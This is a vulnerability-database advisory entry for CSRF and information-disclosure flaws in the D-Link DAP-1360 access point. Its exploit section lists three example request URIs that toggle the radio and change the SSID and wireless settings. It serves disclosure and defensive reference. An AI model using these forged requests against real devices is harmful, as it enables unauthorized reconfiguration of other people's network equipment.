ID
VAR-E-201411-0374
TITLE
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
Trust: 0.3
DESCRIPTION
D-Link DAP-1360 is prone to multiple cross-site request-forgery vulnerabilities and an information-disclosure vulnerability.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, gaining unauthorized access to the affected device and obtaining sensitive information; other attacks are also possible.
Trust: 0.3
AFFECTED PRODUCTS
vendor: | d link | model: | dap-1360 | scope: | eq | version: | 1.0.0 | Trust: 0.3 |
EXPLOIT
Attackers can use a browser to exploit these issues. To exploit the cross-site request-forgery issue, an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URIs are available:
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Design Error
Trust: 0.3
CREDITS
MustLive
Trust: 0.3
EXTERNAL IDS
db: | BID | id: | 71000 | Trust: 0.3 |
REFERENCES
url: | http://www.dlink.com/ | Trust: 0.3 |
url: | http://seclists.org/fulldisclosure/2014/nov/19 | Trust: 0.3 |
SOURCES
db: | BID | id: | 71000 |
LAST UPDATE DATE
2022-07-27T09:27:24.301000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 71000 | date: | 2014-11-08T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 71000 | date: | 2014-11-08T00:00:00 |